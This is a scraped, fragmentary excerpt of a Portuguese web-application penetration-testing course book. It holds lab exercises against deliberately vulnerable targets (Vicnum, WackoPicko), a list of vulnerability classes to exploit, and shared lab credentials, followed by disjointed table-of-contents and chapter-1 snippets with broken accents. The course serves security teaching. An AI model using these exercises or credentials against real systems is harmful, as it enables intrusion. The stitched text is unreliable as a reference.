O propsito desta atividade descobrir as vulnerabilidades na aplicao Vicnum, que permitem que usurios trapaceiem no jogo e obtenham um resultado perfeito.
2. Acesse http://vicnum.esr.rnp.br/
3. Entenda como funciona o jogo Vicnum, participando de algumas rodadas.
4. Execute o teste de invaso completo, para identificar as vulnerabilidades que permitem
que alguns usurios trapaceiem.

Atividade 2 Capture a bandeira

O objetivo desta atividade exercitar todo o conhecimento adquirido neste curso, permitindo que o leitor realize um teste de invaso completo, em uma aplicao contendo
diversos tipos de vulnerabilidades:
1 Acesso direto a recursos (1x).

1 Cross-site scripting (5x).
1 Exposio de arquivos do sistema operacional (1x).
1 Falha em lgica de negcio (1x).
1 Identificadores de sesso previsveis (1x).
1 Incluso de arquivos (1x).
1 Injeo de comandos (1x).
1 Injeo de SQL (2x).
1 Manipulao de parmetros (1x).
1 Revelao de informaes (1x).
1 Senha fraca (1x).
1 Transporte inseguro de informaes (2x).
Para acessar a aplicao, digite a seguinte URL em um navegador web:
http://wackopicko.esr.rnp.br/
1 Navegao de diretrios (1x).
487
Algumas contas pr-cadastradas, que podem ser usadas, incluem:
1 scanner1/scanner1.
1 scanner2/scanner2.
1 bryce/bryce.
A partir dessas informaes, aplique a metodologia apresentada no Captulo 2, baseada nas
etapas de reconhecimento, mapeamento, descoberta de vulnerabilidades e explorao, e
sucesso na realizao da atividade!
488
Bibliografia 10
1 AUGER, Robert et al. WASC Threat Classification Version 2.00. Web Application Security
Consortium, 2010.
1 GORDEYCHIK, Sergey, GROSSMAN, Jeremiah, KHERA, Mandeep, LANTINGA, Matt,

WYSOPAL, Chris, ENG, Chris, SHAH, Shreeraj, LEE, Lawson, MURRAY, Campbell e EVTEEV,
Dmitry. Web Application Security Statistics 2008. Web Application Security Consortium, 2008.
1 MELL, Peter, SCARFONE, Karen e ROMANOSKY, Sasha. CVSS A Complete Guide to the
Common Vulnerability Scoring System Version 2.0. FIRST, 2007.

489
LIVRO DE APOIO AO CURSO
Um teste de invaso, tambm chamado de teste de penesegurana de um ambiente, plataforma ou sistema, por
meio da simulao de ataques reais explorando as vulnedura de vulnerabilidades, que recorre ao simples uso de
ferramentas automatizadas, pentest um processo cclico
que depende principalmente do conhecimento do auditor
de segurana que o realiza. O curso introduz as principais
tcnicas que podem ser empregadas.
Este livro inclui os roteiros das atividades prticas e o contedo dos slides apresentados em sala de aula, apoiando
suas organizaes ou localidades de origem.
ISBN 978-85-63630-17-9
9 788563 630179
490

Teste de Invasão de Aplicações Web PDF

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Teste de Invasão de Aplicações Web PDF

Enviado por

Direitos autorais:

Formatos disponíveis

Teste de Invaso

Copyright 2013 Rede Nacional de Ensino e Pesquisa RNP

Jos Luiz Ribeiro Filho

Escola Superior de Redes

Equipe ESR (em ordem alfabtica)

Escola Superior de Redes

Rua Lauro Mller, 116 sala 1103

Dados Internacionais de Catalogao na Publicao (CIP)

Descoberta de vulnerabilidades e explorao65

3. Teste do mecanismo de autenticao

Roteiro de Atividades 3123

4. Teste do gerenciamento de sesses

XSS baseado em DOM182

8. Teste do mecanismo de autorizao e da lgica de negcio

Exerccio de fixao 3 ECB449

10. Escrita de relatrios e exerccio completo

Escola Superior de Redes

As sesses de aprendizagem onde se do a apresentao dos contedos e a realizao das

Convenes utilizadas neste livro

Dedico este trabalho:

Segurana em aplicaes web

Ciclo de desenvolvimento de software seguro, arquiteturas e tecnologias de

roubo de informaes confidenciais e invases de redes corporativas.

Captulo 1 - Segurana em aplicaes web

% do total de vulnerabilidades reportado ao CVE

total do sistema operacional.

1 Anlise de documentos de requisitos, projeto e arquitetura: permite detectar

1 Ferramentas automatizadas: so timas para auxiliar um analista de segurana na

Teste de Invaso de Aplicaes Web

Porm, no so capazes de encontrar inmeras classes de problemas, que necessitam de

Ciclo de desenvolvimento de software seguro

1 Na etapa de especificao, requisitos explcitos de segurana devem ser enumerados

1 Testes de segurana so fundamentalmente diferentes de testes funcionais e, por

1 Por fim, e no menos importantes, encontram-se a implantao do sistema no

Custo relativo para correo

Projeto de alto nvel

Captulo 1 - Segurana em aplicaes web

conforme ilustrado na Figura 1.2, extrada de Wysopal et al. (2006).

Segmento de rede que

tenta encontrar fluxos no previstos que possam comprometer a aplicao. A automao

1 Guia de desenvolvimento (Wiesmann et al., 2005): descreve as melhores prticas de

1 WebScarab: ferramenta escrita em Java, para ser utilizada em testes de segurana de

Captulo 1 - Segurana em aplicaes web

e inclui diversos exemplos prticos de cdigos em JEE, ASP.NET e PHP.

1 WebGoat: uma aplicao web propositadamente insegura, criada com o objetivo de

Arquiteturas e tecnologias de aplicaes web

esttico composto por documentos e imagens.

nibilizada. O mximo permitido consistia na navegao por documentos, contendo assuntos

Teste de Invaso de Aplicaes Web

Solues hbridas procuraram mesclar modelos orientados a pginas com o poder

Captulo 1 - Segurana em aplicaes web

Navegadores web: Internet Explorer, Firefox e Chrome.

hierglifos irregulares na representao de algumas informaes. O objetivo de tal prtica

A criptografia moderna, nascida desse marco, compreende um conjunto de tcnicas

1 Confidencialidade: requisito de segurana da informao que objetiva garantir que a

1 Autenticidade: um requisito de segurana da informao que se desdobra em

Cifras so mecanismos criptogrficos utilizados na proteo do sigilo da informao e

Captulo 1 - Segurana em aplicaes web

determinar uma chave a partir da outra e, em muitos casos prticos, as duas so

ciframento (chave pblica) e deciframento (chave privada), mas que so relacionadas

Funes de hash criptogrficas

1 Resistncia da pr-imagem: para essencialmente qualquer valor hash, deve ser

1 Resistncia a colises: deve ser computacionalmente infactvel encontrar duas